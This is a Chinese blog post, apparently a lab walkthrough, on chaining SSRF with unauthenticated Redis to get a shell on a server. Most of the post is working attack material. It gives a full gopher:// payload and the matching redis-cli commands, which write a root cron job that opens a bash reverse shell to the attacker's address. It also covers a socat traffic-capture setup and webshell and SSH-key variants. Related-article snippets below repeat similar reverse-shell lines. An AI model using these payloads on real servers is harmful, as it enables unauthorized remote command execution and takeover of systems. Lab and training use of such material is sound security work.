ssrf+redis未授权靶场

最新推荐文章于 2025-05-13 21:38:23 发布
最新推荐文章于 2025-05-13 21:38:23 发布
阅读量2.2k 收藏 5
点赞数 3
分类专栏: 靶场 文章标签: redis 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_53396158/article/details/127505348
版权
本文详细介绍了SSRF结合Redis未授权访问的利用原理和步骤,包括端口扫描、本地文件读取和利用Gopher协议作为跳板。通过实例展示了如何设置实验环境,利用Wireshark和socat抓取并分析流量,以及获取服务器shell的三种方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ssrf+redis靶场利用

原理:服务端提供了从其他服务器获取数据的功能,而且没做好限制

非常类似文件包含

常见功能点

  • 在线翻译网页
  • 图片加载
  • 网站信息收集

可利用点

  • 端口扫描,用dict
  • 本地敏感数据file
  • 做跳板利用其它漏洞gophar

验证:抓包分析服务器是否发送请求

利用

  • http协议访问内外网web资源
  • file协议读取本地文件
  • dict协议探测内外网tcp端口
  • gopher协议做跳板

ssrf+redis未授权实验

环境准备

  • kali攻击机 192.168.0.4
  • ssrf靶场 web靶场添加一个ssrf利用文件 192.168.0.10
  • redis未授权靶场 192.168.0.9

本实验均在同一网段下,因为没找到redis不出网的利用方式,凑合联动一下

redis靶场

#设置只允许ssrf靶场服务器访问6379
firewall-cmd --add-rich-rule='rule family=ipv4 source address=192.168.0.10 port port=6379 protocol=tcp accept'

在这里插入图片描述

可以看到kali不能直接访问,但可以通过ssrf来访问

在这里插入图片描述

构造攻击payload利用

在这里插入图片描述

#自己改ip  在进行一次url编码利用两次编码后的payload
gopher://192.168.0.7:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$7%0d%0afarmsec%0d%0a$59%0d%0a%0a%0a*/1 * * * * bash -i >&/dev/tcp/192.168.0.4/3333 0>&1%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a%0a

payload制作教程

  • 自写脚本或者用大佬们写的 cp自己改也行
  • 利用wireshark抓流量
  • 利用socat看流量
#攻击机执行
#socat
socat -v tcp-listen:6379,fork tcp-connect:192.168.0.7:6379
#这种手法是先搞一个本地靶场,把自己攻击机流量转发到本地redis靶场
redis-cli -h 127.0.0.1 flushall         #清空数据库。
echo -e "\n\n*/1 * * * * bash -i >&/dev/tcp/192.168.10.96/3333 0>&1\n\n"|redis-cli -h 127.0.0.1 -x set abc      #写入脚本赋值abc
redis-cli -h 127.0.0.1 config set dir /var/spool/cron/    #设置工作目录centos是这个目录
redis-cli -h 127.0.0.1 config set dbfilename root     #设置保存文件名字
redis-cli -h 127.0.0.1 save      #保存

这样就把流量抓到攻击机可以开nc监听,发送payload了

一般针对redis未授权是三种getshell方法(还有一些高端玩法)分别是

  • 针对同时有web服务器的可以写webshell

  • 针对root权限有ssh的可以写公钥

  • 针对centos服务器root权限可以写cron(因为ubuntu那种目录权限有些问题)

redis数据库非授权访问-SSRF
千寻的博客
02-09 1165
文章目录第一步 :获取镜像第二步 启动docker镜像第三步:登录docker镜像第四步:访问weblogic(7001端口)第五步:存在SSRF 漏洞抓到的数据包进行内网的探测补充:redis 数据库第六步 通过读写计划任务文件crontab反弹Shell 到指定地址url编码burp里面提交第七步 第六步的同时设置监听 第一步 :获取镜像 [cd Desktop/] [cd vulhub-ma...
深入解析SSRFRedis未授权访问
m0_66993332的博客
08-24 1249
etc/crontab 这个是肯定的/etc/cron.d/* 将任意文件写到该目录下,效果和crontab相同,格式也要和/etc/crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行弹shell。/var/spool/cron/root centos系统下root用户的cron文件/var/spool/cron/crontabs/root debian系统下root用户的cron文件SSRFRedis未授权访问是两类常见但极具威胁的安全漏洞。
组合拳SSRF+redis未授权访问
09-15 791
组合拳SSRF+redis未授权访问
通过SSRF击穿内网!kali-ssrf靶场实战!
最新发布
十步不敢沙人的博客
05-13 674
SSRF攻击如何利用服务端穿透内网防护?本文基于国光老师靶场手把手复现攻击链,详解协议漏洞利用及内网端口扫描技巧,深度拆解SQL注入,请求权限限制等防御方案,助你构建企业级SSRF漏洞防护体系!
利用Weblogic中间件存在的SSRF漏洞结合redis未授权访问漏洞GetShell
wenqingshuo321的博客
10-11 928
在Search Public Registries,选择Public Registry中的 IBM,同时勾选Search by business name,开启bp进行抓包,点击search。set 1 "\n\n\n\n * * * * * root bash -i >& /dev/tcp/{本地物理机ip}/1234 0>&1\n\n\n\n"给redis服务器发送三条命令,将其写入redis的容器里里面的/etc/crontab,从而将shell反弹到本地物理机ip的1234端口。
再探SSRF服务器请求伪造(weblogic cve ssrf redis未授权
热门推荐
Love&Share
04-26 1万+
攻击Redis 漏洞环境 复现环境使用vulhup weblogic ssrf 地址:https://vulhub.org/#/environments/weblogic/ssrf/ vulhub使用:https://vulhub.org/#/docs/run/ WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Jav
Root me CTF all the day靶场ssrf+redis漏洞
M372109150的博客
10-10 1680
本篇介绍了root me CTF all the day靶场SSRF BOX中的漏洞,使用SSRF+redis 获取内网主机权限,利用SSRF来对redis未授权访问执行命令。从而达到获取主机权限的目的。
ssrf+redis未授权访问漏洞复现
m0_65466288的博客
08-26 459
进入题目,我们分析下源码,源码过滤了file协议、dict协议、127.0.0.1和localhost,但没有过滤http协议和gopher协议我们使用http协议进行内网主机存活探测,发现存在ssrf漏洞。这里我们可以看到只开放了80端口,感觉没什么用,随后又手动探查172.21.0.1,发现这个ip并没有什么反应,不甘心再次尝试172.21.0.3,转机出现了。将生成的payload再次用url进行编码,然后发送过去,然后使用ssrf访问这个内网的upload/shell.php文件得到flag。
ssrf结合redis未授权getshell
07-07 1518
原理即为攻击者通过SSRF访问内网或本地的redis6379端口,如果刚好存在redis未授权,即可getshell
SSRF漏洞与redis未授权访问的共同利用
网安小菜鸡的博客
08-26 1186
SSRF漏洞允许攻击者通过向服务器发起请求来伪造请求。这种漏洞的核心在于攻击者能够控制服务器向任意目标地址发起请求,而这些请求通常是攻击者无法直接从客户端发起的。简单来说,假设你的网站有一个功能,它允许用户输入一个网址,并从该网址获取信息。这时候,如果网站的服务器没有足够的安全控制,攻击者可能会通过提交特定的地址,诱使服务器去访问攻击者指定的内部或外部资源。
Redis未授权访问及配合SSRF总结
saber的博客
10-24 1445
Redis是一个开源的内存数据库,它用于存储数据,并提供高性能、可扩展性和丰富的数据结构支持。默认情况下,会绑定在,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问Redis的情况下,利用Redis自身的提供的config命令,可以进行写文件操作,并且写公匙登录。
SSRF+redis未授权漏洞复现
qq_57094995的博客
10-04 763
ssrf+redis未授权漏洞的复现
SSRF综合靶场
hot_milk1的博客
02-20 1450
常见的SSRF的一些利用。
dedis&weblogic ssrf利用redis未授权反弹shell
Feng_Blue_的博客
10-27 487
本文仅提供于学术探讨,如有后果自行承担。 redis数据库未授权访问漏洞复现 启用漏洞环境 借助工具来进行操作 查看基本帮助 weblogic ssrf利用redis未授权访问反弹shell
SSRF漏洞靶场
WINDY_PACE的博客
05-15 2997
对于SSRF,回显是能够成功利⽤的重要条件,所以过滤返回信息,验证远程服务器对请求的响应是⽐较容易的⽅法。如果WEB应⽤ 是去获取某⼀种类型的⽂件,那么在把返回结果展⽰给⽤户之前先验证返回的信息是否符合标准。 禁⽤不需要的协议,仅仅允许HTTP和HTTPS请求。可以防⽌类似于file://、gopher://、ftp://等引起的问题
利用 SSRFRedis 未授权访问进行内网渗透
智商不在服务区的博客
03-31 903
在本次实验中,我们使用 Docker 环境进行测试。解压实验包,搭建docker环境。docker环境web的dockerfile主要利用代码redis服务器通过启动相关容器,初次启动失败。发现docker版本问题,删除docker版本 3,并尝试重新拉取重新启动后,环境成功搭建,获取内网 IP。我们使用抓包工具检测内网存活主机,发现172.18.0.2存在HTTP服务,并返回Go away。使用burpsuite对172.18.0.2进行端口扫描,发现6379端口返回Redis
SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell
m0_64378913的博客
07-04 1570
概述:Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。redis存在未授权访问漏洞(在访问redis数据库时,无需提供用户名及密码,且具备root权限读写文件)。影响范围:版本10.0.2、版本10.3.6。WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Jav
vulfocus靶场redis 未授权访问漏洞之CNVD-2015-07557
没有故事
04-18 1426
python3 redis-rogue-server.py --rhost 目标IP --rport 目标端口 --lhost 攻击者服务器IP。>" #向文件中写入内容。config set dbfilename 1.php #写入文件。主从复制getshell,写入恶意的so文件达到执行系统命令的目的。config set dir /tmp #创建临时目录。利用条件:需要web目录有读写权限,只有读权限会失败。证明web目录具有写权限,可以进行利用。
ctfhub SSRF
08-27
ctfhub是一个CTF训练平台,提供了多个CTF挑战模块,其中包括了SSRF模块。SSRF(Server-Side Request Forgery)是一种攻击技术,可以利用服务器端请求伪造漏洞来发送恶意请求。在ctfhub的SSRF模块中,你可以学习和实践SSRF攻击技术,并利用平台上提供的漏洞来进行实验。 在SSRF中,有一个重要的点是请求可能会跟随302跳转。你可以尝试利用这个来绕过对IP的检测,访问位于127.0.0.1的flag.php文件,从而获取敏感信息。 此外,在SSRF中还可以使用Gopher协议来攻击内网的服务,例如Redis、Mysql、FastCGI、Ftp等等,并发送GET和POST请求。Gopher协议可以说是SSRF中的万金油,大大拓宽了SSRF的攻击面。你可以构造类似于"/?url=file:///var/www/html/flag.php"的本地地址来尝试攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [network-security:学习web安全练习的靶场,以及总结的思维导图和笔记](https://download.youkuaiyun.com/download/weixin_42118423/15763452)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [CTFHub—SSRF](https://blog.youkuaiyun.com/qq_45927819/article/details/123400074)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [CTFHUB--SSRF详解](https://blog.youkuaiyun.com/qq_49422880/article/details/117166929)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值